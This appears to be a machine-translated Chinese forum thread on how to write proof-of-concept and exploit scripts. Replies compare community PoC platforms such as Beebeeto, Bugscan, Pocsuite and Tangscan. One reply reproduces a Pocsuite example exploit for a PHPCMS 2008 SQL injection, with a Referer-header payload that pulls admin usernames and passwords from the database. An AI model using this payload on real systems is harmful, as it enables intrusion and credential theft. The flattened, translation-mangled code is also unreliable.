I have read some public poc before. It's a bit confusing! Are there any tutorials! A simple example is provided to demonstrate the process! And how to write pocexp in combination with the poc framework? I have read some public poc before. It's a bit confusing!
Are there any tutorials! A simple example is provided to demonstrate the process!
Also, how can I combine the poc framework to compile poc/exp? Reply content:
ZookeeperI am relieved to see that everyone is promoting their own platforms.
The concept of this community-based vulnerability verification script platform may first come from the Metasploit community. Security researchers voluntarily write standardized vulnerability verification scripts or attack scripts using official frameworks and publish them to aggregation, due to the framework's mandatory specification code, various products can easily call a large number of verification/attack scripts compiled by the "Community" for scanning, attack, verification, and other purposes.
Aside from propaganda, I will analyze the current situation of such platforms and think about the future. In the past two years, a large number of "community-based" PoC platforms have emerged in China, of course, it can be predicted that the service will be closed or a new platform will appear in the next two years.
Partial list (Summary Excerpted from Description & Title ):
- Http://www.beebeeto.com/: Beebeeto is a standardized POC/EXP platform jointly maintained by many security researchers.
- Https://www.bugscan.net/: The first community-based Scanner
- Http://vul.jdsec.com/: The poor odd vulnerability library is an information collection platform launched by the Network knife security team for archiving vulnerability information.
- Https://www.sebug.net/: Sebug is an authoritative vulnerability reference, sharing and learning platform. It is the earliest and most authoritative vulnerability library in China.
- Http://tangscan.com/: Tang Dynasty Security cruise (TangScan) is an enterprise online security platform maintained by many security researchers in the community, enterprises can perform security vulnerability detection and monitoring on their enterprise networks in Tangscan to discover important security problems hidden in the network.
- Http ://.....
The current framework is constrained, not comfortable
One year before Beebeeto went live, I thought about as many details (from the perspective of users, writers, and managers) about community vulnerability verification scripts.
Vulnerability exposure-> code writing-> script management-> script exploitation-> ...,In the face of the above process, we have promoted BBS Community, and launched a framework to force standardized writers to fill in vulnerability-related fields and correspond to function bodies, so as to facilitate future (Beehive) scanners. After that, many community-based leak scanning platforms emerged in the security industry. I began to use and compile the framework scripts of my family from the user's perspective, so that I realized that the current framework is not comfortable. It forces me to fill in each field, and each field needs to go to the official document or Demo code to view the corresponding content, such as VulType in Beebeeto, the author is required to view the official documentation to find the Vulnerability Type and fill in the corresponding English version, vulnerability description and other fields. In fact, these fields can be simplified, and only one Referer may be required.
Let's just talk about what @ Neargle mentioned:
Therefore, less than 10 lines of code are actually functional.
This sentence is very valuable for thinking. For example:
- How to Learn from the PoC & Exploit process;
- How to achieve the fastest and most convenient encoding when using scripts with long-term encoding vulnerabilities;
- Whether the code can help the writer to save the Vulnerability_info field;
- Quick verification, quick writing, and quick detection of vulnerabilities to be written;
- In a large number of existing vulnerability verification scripts, how can we accurately and quickly query the repeated probability;
- ...
There are more problems that need to be solved. (Omitted three hundred words)
How to get started
These platforms are working hard to make it easy to write verification/attack scripts. They teach a lot of writing methods. At least developers need to have the coding skills of the corresponding language, and secondly, they have a little knowledge about the vulnerability principles, it's almost the same. Read more and write more. This is a process that requires accumulation of experience. If you have not learned it, think about your own problems and check whether the platform/framework is too bad? Finally, it is important to select a suitable platform.
Future possibilities
Foreseeable steps:
- Vulnerability outbreak
- Details Publishing
- Script release
- Product Support
- Benefits
- ...
Well, now I have to tell myself that users are not only lazy but also stupid. Look at this http://sebug.net
The navigation help shows detailed procedures of the Pocsuite framework. For your reference: Recently, this exp platform is also being written. Interfaces and frameworks are always troublesome.
@ Evi1m0 what the gods say makes sense. There may be more than 10 lines of code that really work. However, to consider interfaces and other details, you need to write a lot of redundant code.
To write such exp, you don't need much programming knowledge. You just need to understand the principle of the vulnerability, and add some basic syntaxes and corresponding libraries.
We feel that this platform is a trend, and automated penetration can reduce a lot of tedious processes. There is no advertisement, but I wrote it for myself. Who knows it. The three giants appeared upstairs. Who else is there. Front ad space. The two upstairs helped them publicize their own projects, and I also helped them publicize the projects.
Wooyun tangscan, there is a detailed poc to write help documentation, not only can learn python, but also in the process of familiar with some general vulnerabilities of the formation of causes and use methods, the official website address http://tangscan.com
.
Wooyun! There are also good reward methods, which are used to pay dividends on a monthly basis. For example, if you submit dozens of poc jobs at a time, you can wait for Beebeeto every month if you do not submit them for many years.
Then let's talk about our own views:
In fact, no matter whether Tangscan of wooyun is good, you know the Pocsuite of chuangyu, and Beebeeto (Bugscan has not been written, but should not be particularly familiar with it). Regarding the Poc and Exp of Web, both depend heavily on two Python libraries.
1. Requests: simulates interaction actions such as Web Requests and responses.
2. Re: a regular expression used to verify whether the returned results meet the vulnerability expectations and whether the vulnerability exists.
Most of the remaining code is vulnerability information.
Take Pocsuite and Tangscan as examples:
Example of official Pocsuite documentation:
#! /Usr/bin/env python # coding: utf-8import reimport urlparsefrom pocsuite.net import reqfrom pocsuite. poc import POCBase, Outputfrom pocsuite. utils import registerclass TestPOC (POCBase): vulID = '000000' # ssvid version = '1' author = ['Medici. yan '] vulDate = '2017-11-21' createDate = '2017-09-23 'updateDate = '2017-09-23' references = [' http://www.sebug.net/vuldb/ssvid-62274 '] Name =' _ 62274_phpcms_2008_place_ SQL _inj_PoC 'appPowerLink =' http://www.phpcms.cn 'Appname = 'phpcms' appVersion = '000000' vulType = 'SQL Injection' desc = ''' PHPCMS 2008's advertisement module has a lax parameter filtering vulnerability, leading to the SQL Injection vulnerability, if the error display is enabled on the other server, you can directly use it. If the error display is disabled, you can use a time-and error-based blind note ''' samples = [' http://10.1.200.28/ '] Def _ attack (self): result = {} vulurl = urlparse. urljoin (self. url,'/data/js. php? Id = 1') payload = "1', (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2 ), (SELECT concat (char (45, 45), username, char (45, 45), password, char (45, 45) from phpcms_member limit 1) a from information_schema.tables group by) b), '0') # "head = {'Referer': payload} resp = req. get (vulurl, headers = head) if resp. status_code = 200: match_result = re. search (r 'duplicate entry \ '1 --(. + )---(. +) -- \ 'for key', Resp. content, re. I | re. m) if match_result: result ['admininfo'] = {} result ['admininfo'] ['username'] = match_result.group (1) result ['admininfo'] ['Password'] = match_result.group (2) return self. parse_attack (result) def _ verify (self): result = {} vulurl = urlparse. urljoin (self. url, '/data/js. php? Id = 1') payload = "1', (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), md5 (1 )) a from information_schema.tables group by a) B), '0') # "head = {'Referer': payload} resp = req. get (vulurl, headers = head) if resp. status_code = 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp. content: result ['verifyinfo'] = {} result ['verifyinfo'] ['url'] = vulurl result ['verifyinfo'] ['payload'] = Payload return self. parse_attack (result) def parse_attack (self, result): output = Output (self) if result: output. success (result) else: output. fail ('Internet nothing returne') return outputregister (TestPOC)
Welcome to the bugscan.
Welcome to the bugscan.
Welcome to the bugscan.
Important: three times
Http://www.bugscan.net
To join the bugscan community, you can use the artifact bugscan.
All plug-ins are completely open within the Community, and learning to write poc is meaningless.
Hope to make progress together with you
